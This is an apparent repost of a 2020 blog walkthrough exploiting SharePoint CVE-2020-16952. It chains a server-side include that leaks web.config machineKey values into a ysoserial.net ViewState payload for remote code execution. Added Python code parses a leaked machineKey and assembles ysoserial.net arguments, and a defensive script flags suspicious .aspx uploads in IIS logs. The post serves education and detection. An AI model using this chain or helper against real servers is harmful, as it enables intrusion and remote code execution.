How to Exploit Microsoft SharePoint for SSI and ViewState Deserialization

Pawan Jaiswal, published in The Startup, Oct 31, 2020

CVE-2020-16952

In this post you will learn how to exploit a server-side include (SSI) vulnerability in Microsoft SharePoint and chain it with ViewState deserialization to obtain remote code execution. Read the complete post for a proper understanding of the vulnerability and its exploitation.

Introduction:

SharePoint is one of the most popular web-based collaboration and content management platforms from Microsoft. Security researchers recently found a remote code execution vulnerability (CVE-2020-16952) affecting three Microsoft SharePoint products. To exploit it, an attacker first abuses a server-side include to read the server's web.config and then uses the leaked machineKey values to forge a ViewState deserialization payload.

[Image: vulnerability description (source: NVD)]

The affected products are listed below:

[Image: affected-product table (source: Microsoft)]

Exploitation:

For demonstration purposes, I installed the Windows Server 2016 evaluation version in a VirtualBox VM and completed the setup of Microsoft SharePoint Enterprise Server 2016.

To exploit this vulnerability, we need valid credentials to log in to the application. The account must also have the page creation privilege, which is a standard permission in SharePoint.

We use the HTTP PUT method to upload a new page containing some arbitrary data. The command is shown in the image below.

[Image: Using the PUT method]

Then we open the new page in the browser to confirm that we have file upload privileges.

[Image: Accessing sample.aspx]

Next, using Burp Suite, we create a file called ssi.aspx with the payload shown in the image below to exploit the SSI vulnerability.

[Image: Creating a new file for SSI]

Now we retrieve the web.config file through the include. From it we note down the validationKey value and the validation algorithm, which we will use to generate the ViewState payload (if ViewState encryption is enabled on the target, the decryptionKey and decryption algorithm are needed as well).

[Image: Exploiting SSI to retrieve web.config]
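As an added example, not part of the original post, the following Python helper does that note-taking step mechanically: it parses the `<machineKey>` element out of a leaked web.config, reports whether the keys are static (an `AutoGenerate` setting is useless to an attacker because the actual key lives in the server's registry and never appears in the file), looks up the MAC length the validation algorithm implies, and assembles the argument list for ysoserial.net's ViewState plugin. The web.config content is a constructed sample with placeholder keys, the flag names are those of ysoserial.net's ViewState plugin (check its help output against your version), and the `/sample.aspx` path is an assumption.

```python
import xml.etree.ElementTree as ET
from typing import Optional

# Constructed sample web.config fragment (not from the post). The key values are
# placeholders, not real SharePoint keys.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="FEDCBA9876543210FEDCBA9876543210"
                validation="HMACSHA256"
                decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

# Length in bytes of the MAC that ASP.NET appends to the ViewState blob for each
# validation setting. "3DES" and "AES" as validation values select SHA1 for the MAC.
MAC_LENGTHS = {"MD5": 16, "SHA1": 20, "3DES": 20, "AES": 20,
               "HMACSHA256": 32, "HMACSHA384": 48, "HMACSHA512": 64}


def parse_machine_key(xml_text: str) -> Optional[dict]:
    """Return the machineKey attributes from a web.config, or None if the element
    is absent. Missing attributes fall back to the ASP.NET 4.x defaults."""
    root = ET.fromstring(xml_text)
    node = root.find(".//machineKey")
    if node is None:
        return None
    return {
        "validationKey": node.get("validationKey", "AutoGenerate,IsolateApps"),
        "decryptionKey": node.get("decryptionKey", "AutoGenerate,IsolateApps"),
        "validation": node.get("validation", "HMACSHA256"),
        "decryption": node.get("decryption", "Auto"),
    }


def is_static_key(value: str) -> bool:
    """A key written out as hex in web.config is usable once leaked; an AutoGenerate
    key is stored in the machine's registry and never appears in the file."""
    return not value.upper().startswith("AUTOGENERATE")


def mac_length(validation: str) -> int:
    """Bytes of MAC trailing the ViewState blob for the given validation setting."""
    return MAC_LENGTHS[validation.upper()]


def ysoserial_viewstate_args(mk: dict, path: str, apppath: str, command: str,
                             gadget: str = "TextFormattingRunProperties") -> list:
    """Assemble the argument list for ysoserial.net's ViewState plugin from the
    leaked machineKey. path/apppath must match the page the payload is posted to,
    because both feed the MAC modifier."""
    if not is_static_key(mk["validationKey"]):
        raise ValueError("validationKey is auto-generated; web.config does not leak it")
    args = ["ysoserial.exe", "-p", "ViewState", "-g", gadget, "-c", command,
            f"--path={path}", f"--apppath={apppath}",
            f"--validationalg={mk['validation']}",
            f"--validationkey={mk['validationKey']}"]
    if is_static_key(mk["decryptionKey"]):
        # Only needed when ViewState is encrypted, but harmless to pass otherwise.
        args += [f"--decryptionalg={mk['decryption']}",
                 f"--decryptionkey={mk['decryptionKey']}"]
    return args


if __name__ == "__main__":
    mk = parse_machine_key(SAMPLE_WEB_CONFIG)
    print(mk)
    print("MAC length:", mac_length(mk["validation"]))
    print(" ".join(ysoserial_viewstate_args(mk, "/sample.aspx", "/", "notepad.exe")))
```

The path and application path are not cosmetic: ASP.NET mixes the page's template directory and type into the MAC modifier, so a payload signed for one page will be rejected with a MAC validation error on another.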

Moving to the second step of the exploit, the ViewState deserialization. We now generate a serialized ViewState payload with ysoserial.net that opens Notepad on the target server.

[Image: Generating the payload using ysoserial.net]

With the payload in hand, we place it in a request to an endpoint that accepts a ViewState parameter and send the request.

[Image: Sending the payload to open Notepad on the target server]

Checking the VM, we observe that Notepad has opened, which confirms execution of the payload.

Similarly, using ysoserial.net, we can obtain a reverse shell on the server.
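On the defensive side, as an added example that is not from the post, the chain above leaves a recognisable trace in the IIS W3C logs of the SharePoint web front end: an authenticated PUT that creates a web-executable page (.aspx, .ashx, .asmx, .ascx, .master) under a site, followed within minutes by the same user requesting that page. The Python below parses such a log using its `#Fields:` header and flags that pattern. The log excerpt is constructed for this example (hosts, users and times are invented); field names follow the default IIS W3C layout, and IIS writes spaces inside a field as `+`, so lines split cleanly on whitespace.

```python
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (not from the post). IIS encodes spaces inside a
# field as '+', so each record splits cleanly on whitespace. Times are UTC.
SAMPLE_IIS_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2020-10-31 10:15:01 192.168.56.10 GET /sites/demo/SitePages/Home.aspx - 80 LAB\jdoe 192.168.56.20 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 120
2020-10-31 10:15:42 192.168.56.10 PUT /sites/demo/SitePages/sample.aspx - 80 LAB\jdoe 192.168.56.20 curl/7.68.0 - 201 0 0 45
2020-10-31 10:15:50 192.168.56.10 GET /sites/demo/SitePages/sample.aspx - 80 LAB\jdoe 192.168.56.20 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 60
2020-10-31 10:16:30 192.168.56.10 PUT /sites/demo/SitePages/ssi.aspx - 80 LAB\jdoe 192.168.56.20 python-requests/2.24.0 - 201 0 0 40
2020-10-31 10:16:35 192.168.56.10 GET /sites/demo/SitePages/ssi.aspx - 80 LAB\jdoe 192.168.56.20 python-requests/2.24.0 - 200 0 0 80
2020-10-31 10:18:02 192.168.56.10 POST /sites/demo/SitePages/sample.aspx - 80 LAB\jdoe 192.168.56.20 python-requests/2.24.0 - 500 0 0 300
2020-10-31 10:20:00 192.168.56.10 PUT /sites/demo/Shared%20Documents/report.docx - 80 LAB\asmith 192.168.56.21 Microsoft-WebDAV-MiniRedir/10.0 - 201 0 0 30
"""

# Extensions that SharePoint/ASP.NET will execute as server-side code or markup.
WEB_EXECUTABLE_EXT = (".aspx", ".ashx", ".asmx", ".ascx", ".master")


def parse_w3c(log_text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # skip records that do not match the header instead of crashing
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        yield rec


def detect_page_uploads(log_text, window=timedelta(minutes=10)):
    """Flag successful PUTs of web-executable files and list the same user's later
    requests to that path within `window` (the follow-up GET/POST of the chain)."""
    records = list(parse_w3c(log_text))
    findings = []
    for i, rec in enumerate(records):
        path = unquote(rec["cs-uri-stem"]).lower()
        if rec["cs-method"] != "PUT" or not path.endswith(WEB_EXECUTABLE_EXT):
            continue
        if not rec["sc-status"].startswith("2"):
            continue  # rejected uploads are worth a separate rule, not this one
        followups = [r for r in records[i + 1:]
                     if r["cs-username"] == rec["cs-username"]
                     and unquote(r["cs-uri-stem"]).lower() == path
                     and r["ts"] - rec["ts"] <= window]
        findings.append({
            "user": rec["cs-username"],
            "client": rec["c-ip"],
            "path": path,
            "uploaded_at": rec["ts"].isoformat(),
            "followup_methods": [r["cs-method"] for r in followups],
        })
    return findings


if __name__ == "__main__":
    for finding in detect_page_uploads(SAMPLE_IIS_LOG):
        print(finding)
```

Run against the sample, the rule reports the two .aspx uploads by `LAB\jdoe` and ignores the .docx upload, which is ordinary WebDAV traffic; a follow-up POST to a freshly uploaded page (the ViewState submission) is the strongest signal in the set.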

Remediation:

Microsoft has released a security update that addresses the vulnerability by correcting how SharePoint checks the source markup of application packages. I strongly recommend that anyone running these products apply the patch as soon as possible.

Disclaimer:

I neither found this critical vulnerability nor take any credit for the CVE (CVE-2020-16952). I have only created the video after analyzing the descriptions available on various blogs and public forums, to help educate security enthusiasts about this issue. I am not responsible for any damage caused to an organization using this exploit, and I would advise users not to exploit this vulnerability without written consent from the organization, as it may leave the organization open to attacks by other hackers.

I am a self-taught coder and security enthusiast who loves/does automation either to protect or break security loopholes.